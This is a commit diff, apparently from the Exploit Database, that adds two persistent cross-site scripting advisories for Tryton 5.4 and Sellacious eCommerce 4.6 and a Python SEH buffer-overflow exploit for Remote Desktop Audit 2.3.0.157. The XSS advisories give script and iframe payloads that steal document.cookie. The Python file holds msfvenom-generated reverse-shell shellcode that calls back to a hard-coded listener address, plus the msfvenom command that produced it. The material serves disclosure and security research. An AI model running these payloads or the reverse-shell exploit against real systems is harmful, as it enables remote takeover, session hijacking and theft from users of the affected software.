DB: 2020-05-14

4 changes to exploits/shellcodes

Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
Tryton 5.4 - Persistent Cross-Site Scripting
Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2020-05-14 05:01:49 +00:00
parent f564ddfd17
commit fe5d64b70c
5 changed files with 385 additions and 7 deletions

View file

@ -37,10 +37,4 @@ Parameter: id (GET)
[08:55:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
I am looking forward to you accepting and approving my PoC.
Thankyou!
Vu Tien Hoa
back-end DBMS: MySQL >= 5.0.12

View file

@ -0,0 +1,171 @@
# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-05-13
# Vendor Homepage: https://www.tryton.org/
# Version: 5.4
# Software Link: https://www.tryton.org/download
Document Title:
===============
Tryton v5.4 - (Name) Persistent Cross Site Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2233
Common Vulnerability Scoring System:
====================================
4.4
Product & Service Introduction:
===============================
https://www.tryton.org/ & https://www.tryton.org/download
Affected Product(s):
====================
Tryton Foundation
Product: Tryton v5.4 - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-12: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Tryton v5.4 web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the `name` parameter of the
`User Profile` module. Remote attackers with low
privileges are able to inject own malicious persistent script code as
name for user accounts. The injected code can be
used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector
is located on the application-side. Injection point is the profile input
field with the name value and the execute occurs
in the front ui on top right were the avatar is listed or in the admin
backend on the res.user;name="Users"&views.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] User Profile
Vulnerable Input(s):
[+] Name
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] /index
[+] /model/res.user;name="Users"&views (backend)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the application and login to your low privileged user account
2. Move to the profile on top right side (click)
3. Inject test payload to the "Name" input field and save the entry
4. Execution occurs after save on top right and
/model/res.user;name="Users"&views of the admin backend
5. Successful reproduce of the persistent cross site vulnerability!
PoC: Payload
%20>"><img%20src="evil.source%20onload=alert(document.cookie)>
PoC: Vulnerable Source (Execution Point)
<div class="input-group input-group-sm"><span
class="input-group-btn"><button type="button" class="btn
btn-default">Filters</button></span>
<input class="form-control mousetrap" placeholder="Search"
autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist>
<span class="input-group-btn"><button type="button" class="btn
btn-default hidden-md hidden-lg" aria-label="Clear Search"
title="Clear Search" style="display: none;"><img class="icon"
src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button>
<button type="submit" class="btn btn-default" aria-label="Search"
title="Search"><img class="icon"
src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button
class="btn btn-default hidden-xs"
type="button" title="Bookmark this filter" aria-label="Bookmark this
filter"><img class="icon" aria-hidden="true"
src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button
type="button" class="btn btn-default
dropdown-toggle" data-toggle="dropdown" aria-expanded="false"
aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled="">
<img aria-hidden="true" class="icon"
src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button>
<ul class="dropdown-menu dropdown-menu-right" role="menu"
aria-labelledby="bookmarks"></ul><button type="button"
class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show
inactive records" title="Show inactive records">
<img aria-hidden="true" class="icon"
src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div>
--- PoC Session Logs [POST] ---
https://tryton.localhost:8080/tryton/
Host: tryton.localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Session
ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM=
X-Requested-With: XMLHttpRequest
Content-Length: 527
Origin: https://tryton.localhost:8080
Connection: keep-alive
Referer: https://tryton.localhost:8080/
{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">",
"signature":"test
signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1,
"company.rec_name":"Michael Scott Paper
Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10],
"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time":
{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}
-
POST: HTTP/2.0 200 OK
server: nginx/1.16.1
content-type: application/json
access-control-allow-origin: https://tryton.localhost:8080
vary: Origin
content-encoding: gzip
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM

View file

@ -0,0 +1,138 @@
# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vendor Homepage: https://www.sellacious.com
# Version: 4.6
# Software Link: https://www.sellacious.com/free-open-source-ecommerce-software
Document Title:
===============
Sellacious eCommerce - Multiple Persistent Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2226
Common Vulnerability Scoring System:
====================================
4.6
Product & Service Introduction:
===============================
https://www.sellacious.com/free-open-source-ecommerce-software
Vulnerability Disclosure Timeline:
==================================
2020-05-08: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Sellacious eCommerce Shop CMS (2020 Q1).
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The cross site web vulnerabilities are located in the all the adress
input fields of the `Manage Your Addresses` module.
Remote attackers are able to register a low privilege user account to
inject own malicious script code to the adress
information page. The execution of the script code occurs each time the
adress information is used in the web ui of
the ecommerce application. The request method to inject is POST and the
attack vector is persistent on the application-side.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Manage Your Addresses
Vulnerable Input(s):
[+] Full name
[+] First name
[+] Middle name
[+] Last name
[+] Company
[+] PO Box
[+] Address
[+] Landmark
Affected(s):
[+] index.php/manage-your-addresses
[+] Backend user adress information listing
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with user account and low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.
PoC: Exploitation
<iframe src="evil.source" onload=alert(document.cookie)>
<iframe src="evil.source" onload=alert(document.domain)>
PoC: Vulnerable Source
<div class="addresses-container">
<div class="address-heading">
<h2>Your addresses
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
<i class="fa fa-plus"></i> <span class="add-address-text">Add New
Address</span></a></h2></div>
<div id="addresses" class="cart-aio ctech-text-center">
<div id="address-editor">
<ul id="address-items" data-original-title="" title=""> <li
class="address-item" id="address-item-9"> <div class="ctech-float-right
address-action">
<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default
hasTooltip remove-address" data-placement="bottom" data-id="9" title=""
data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a
href="#address-form-9" role="button" data-toggle="ctech-modal"
data-placement="bottom"
class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title=""
data-original-title="Edit"><i class="fa fa-edit"></i></a> </div>
<div class="address-content"> <span class="address_name">>"<iframe
src="evil.source"></span> <span class="address_company">>"<iframe
src="evil.source"></span>
<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
<span class="address_address has-comma">>"<iframe src="evil.source"></span>
<span class="address_landmark has-comma">>"<iframe
src="evil.source"></span> <span class="address_country">United
States</span>
<div class="cart_address_box w100p"> <div class="cart_address_buttons">
</div> </div> </div> </li> <li class="address-item odd-address-item">
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="btn-new-address"><i class="fa fa-plus"></i></a> </li>
</iframe></span></div></li></ul>
<div class="ctech-wrapper">
</div><div class="ctech-clearfix"></div>
</div><div class="ctech-clearfix"></div>
</div></div>
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM

72
exploits/windows/local/48465.py Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: Remote Desktop Audit 2.3.0.157
# Vendor Homepage: https://lizardsystems.com
# Version: 2.3.0.157
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
# Tested on: Windows 7 x86
f = file('payload.txt','w')
"""
Same with LanSend 3.2, but with different ppr address.
PoC
1. Run exploit
2. Run Remote Desktop Audit and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed
"""
"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
"""
shellcode = b""
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
"""
047FFF09 59 POP ECX
047FFF0A 59 POP ECX
047FFF0B 80C1 64 ADD CL,64
047FFF0E ^FFE1 JMP ECX
"""
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'
"""ppr 00418230"""
payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41'
f.write(payload)
f.close()

View file

@ -11070,6 +11070,7 @@ id,file,description,date,author,type,platform,port
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
@ -42694,3 +42695,5 @@ id,file,description,date,author,type,platform,port
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,

Can't render this file because it is too large.